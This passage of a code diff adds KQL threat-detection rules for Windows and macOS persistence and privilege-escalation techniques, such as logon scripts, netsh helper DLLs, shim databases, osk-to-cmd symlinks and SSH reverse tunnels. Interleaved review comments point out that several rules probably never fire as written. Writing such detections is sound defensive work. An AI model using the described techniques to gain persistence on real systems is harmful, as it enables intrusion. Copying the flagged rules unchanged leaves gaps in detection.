+| where (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\Image File Execution Options*" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion*" and RegistryKey endswith "\\SilentProcessExit*"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql
new file mode 100644
index 00000000..c278167e
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Logon Scripts - CommandLine
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
+// Level: high
+// Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1037.001
+// False Positives:
+// - Legitimate addition of Logon Scripts via the command line by administrators or third party tools
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
new file mode 100644
index 00000000..8f7b1c8c
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_registry.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Logon Scripts - Registry
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
+// Level: medium
+// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1037.001, attack.persistence, attack.lateral-movement
+// False Positives:
+// - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate
+
+DeviceRegistryEvents
+| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
new file mode 100644
index 00000000..23c7e4c2
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
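Review bot: `ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"` filters on the wrong event: the description says the rule detects creation of the `UserInitMprLogonScript` *value*, and writing a value produces a `RegistryValueSet` event whose name is in `RegistryValueName`, not a `RegistryKeyCreated` event with the name in `RegistryKey`. As written the rule is unlikely to fire at all. Suggested: `| where ActionType =~ "RegistryValueSet" and RegistryValueName =~ "UserInitMprLogonScript"`, and consider projecting `RegistryValueData` so the false-positive guidance (inspect the script contents) can be followed from the alert.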
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Microsoft Compatibility Appraiser
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks.
+In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql
new file mode 100644
index 00000000..1b1339e5
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Via Netsh Helper DLL
+// Author: Victor Sergeev, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql
new file mode 100644
index 00000000..a3f64d2d
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Netsh Helper DLL - Registry
+// Author: Anish Bogati
+// Date: 2023-11-28
+// Level: medium
+// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
+// False Positives:
+// - Legitimate helper added by different programs and the OS
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh") and (not(((RegistryValueData in~ ("ipmontr.dll", "iasmontr.dll", "ippromon.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
new file mode 100644
index 00000000..dae58d0d
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+
+DeviceRegistryEvents
+| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql
new file mode 100644
index 00000000..af65414b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via PlistBuddy
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: high
+// Description: Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.001, attack.t1543.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "LaunchAgents" or ProcessCommandLine contains "LaunchDaemons") and (ProcessCommandLine contains "RunAtLoad" and ProcessCommandLine contains "true") and FolderPath endswith "/PlistBuddy"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql
new file mode 100644
index 00000000..6c70f9b8
--- /dev/null
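Review bot: `RegistryValueData contains "0x00000001"` carries over the Sysmon `DWORD (0x00000001)` rendering of the value; DeviceRegistryEvents, as far as I can tell, reports REG_DWORD data as a plain decimal string, so an enabled setting would appear as `1` and this condition never matches. Suggested: `| where RegistryValueData == "1" and RegistryKey endswith "\\Outlook" and RegistryValueName =~ "LoadMacroProviderOnBoot"`. Worth checking how the converter renders Sigma `Details: DWORD (0x…)` patterns in general, since any other rule keyed on a DWORD value will have the same gap.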
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Powershell Search Order Hijacking - Task
+// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2022-04-08
+// Level: high
+// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql
new file mode 100644
index 00000000..202552f7
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Scrobj.dll COM Hijacking
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use of the dll.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql
new file mode 100644
index 00000000..e2da4396
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via Shim Database In Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects the installation of a new shim database where the file is located in a non-default location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql
new file mode 100644
index 00000000..4b9d4822
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Via Shim Database Modification
+// Author: frack113
+// Date: 2021-12-30
+// Level: medium
+// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+// False Positives:
+// - Legitimate custom SHIM installations will also trigger this rule
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*") and (not((RegistryValueData =~ "" or RegistryValueData =~ "(Empty)" or isnull(RegistryValueData))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
new file mode 100644
index 00000000..1ef1cf25
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation Using Symlink Between Osk and Cmd
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql
new file mode 100644
index 00000000..a03fbb20
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Process Injection Via Msra.EXE
+// Author: Alexander McDonald
+// Date: 2022-06-24
+// Level: high
+// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Legitimate use of Msra.exe
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql
new file mode 100644
index 00000000..4fc7dbc5
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential PSFactoryBuffer COM Hijacking
+// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
+// Date: 2023-06-07
+// Level: high
+// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
new file mode 100644
index 00000000..c882c39b
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql
@@ -0,0 +1,12 @@
+// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger
+// Author: frack113
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574
+// False Positives:
+// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql
new file mode 100644
index 00000000..d80bf4f8
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql
@@ -0,0 +1,14 @@
+// Title: Potential Registry Persistence Attempt Via Windows Telemetry
+// Author: Lednyov Alexey, oscd.community, Sreeman
+// Date: 2020-10-16
+// Level: high
+// Description: Detects potential persistence behavior using the windows telemetry registry key.
+Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
+This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
+The problem is, it will run any arbitrary command without restriction of location or type.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController*" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql
new file mode 100644
index 00000000..a84df41f
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql
@@ -0,0 +1,13 @@
+// Title: Potential RipZip Attack on Startup Folder
+// Author: Greg (rule)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
+If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
+Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
new file mode 100644
index 00000000..b9de7124
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql
@@ -0,0 +1,10 @@
+// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
+// Author: Rory Duncan
+// Date: 2025-07-14
+// Level: high
+// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "ssh.exe" and ProcessCommandLine contains "-i") or (ProcessCommandLine contains " /create " and ProcessCommandLine contains "sshd.exe" and ProcessCommandLine contains "-f"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql
new file mode 100644
index 00000000..e0b0fdfa
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql
@@ -0,0 +1,16 @@
+// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE
+// Author: Christopher Peacock '@securepeacock', SCYTHE
+// Date: 2021-10-24
+// Level: high
+// Description: Detects PowerShell writing startup shortcuts.
+This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
+Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
+In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
+
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql
new file mode 100644
index 00000000..291e35e0
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential UAC Bypass Via Sdclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "sdclt.exe" and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql
new file mode 100644
index 00000000..0cee95d1
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Web Access Feature Enabled Via DISM
+// Author: Michael Haag
+// Date: 2024-09-03
+// Level: high
+// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002
+// False Positives:
+// - Legitimate PowerShell Web Access installations by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "WindowsPowerShellWebAccess" and ProcessCommandLine contains "/online" and ProcessCommandLine contains "/enable-feature") and (FolderPath endswith "\\dism.exe" or ProcessVersionInfoOriginalFileName =~ "DISM.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql
new file mode 100644
index 00000000..bb1151e7
--- /dev/null
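Review bot: `FolderPath endswith "sdclt.exe"` in the Sdclt hunk lacks the path separator, so any image whose file name merely ends in those characters also matches; every other process rule in this change uses the `"\\<name>.exe"` form, and `FolderPath endswith "\\sdclt.exe"` keeps it consistent. The `"S-1-16-12288"` alternative in `ProcessIntegrityLevel in~ (...)` looks carried over from a Sysmon-style source field; DeviceProcessEvents appears to report only the textual level, so confirm it is needed before keeping it.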
+++ b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql
@@ -0,0 +1,10 @@
+// Title: Registry Persistence via Explorer Run Key
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2018-07-18
+// Level: high
+// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql
new file mode 100644
index 00000000..287d95b5
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql
@@ -0,0 +1,12 @@
+// Title: Regsvr32 DLL Execution With Uncommon Extension
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-17
+// Level: medium
+// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution
+// False Positives:
+// - Other legitimate extensions currently not in the list either from third party or specific Windows components.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql
new file mode 100644
index 00000000..483594bf
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed Vmnat.exe Execution
+// Author: elhoim
+// Date: 2022-09-09
+// Level: high
+// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql
new file mode 100644
index 00000000..dd73044f
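Review bot: In the Renamed Vmnat.exe hunk, `not(FolderPath endswith "vmnat.exe")` excludes every image whose file name ends in those characters, not only a file named exactly `vmnat.exe`, so the rule is narrower than its title states; `not(FolderPath endswith "\\vmnat.exe")` matches the separator convention used by the regsvr32 hunk directly above. The positive condition rests entirely on `ProcessVersionInfoOriginalFileName`, which may be empty for some process events; a one-line `// False Positives:`/limitations note in the header recording that dependency would help whoever tunes the rule.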
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql
@@ -0,0 +1,10 @@
+// Title: Root Account Enable Via Dsenableroot
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-08-22
+// Level: medium
+// Description: Detects attempts to enable the root account via "dsenableroot"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence
+
+DeviceProcessEvents
+| where FolderPath endswith "/dsenableroot" and (not(ProcessCommandLine contains " -d "))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql
new file mode 100644
index 00000000..f6972c12
--- /dev/null
+++ b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql
@@ -0,0 +1,12 @@
+// Title: Rundll32 Registered COM Objects
+// Author: frack113
+// Date: 2022-02-13
+// Level: high
+// Description: load malicious registered COM objects
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
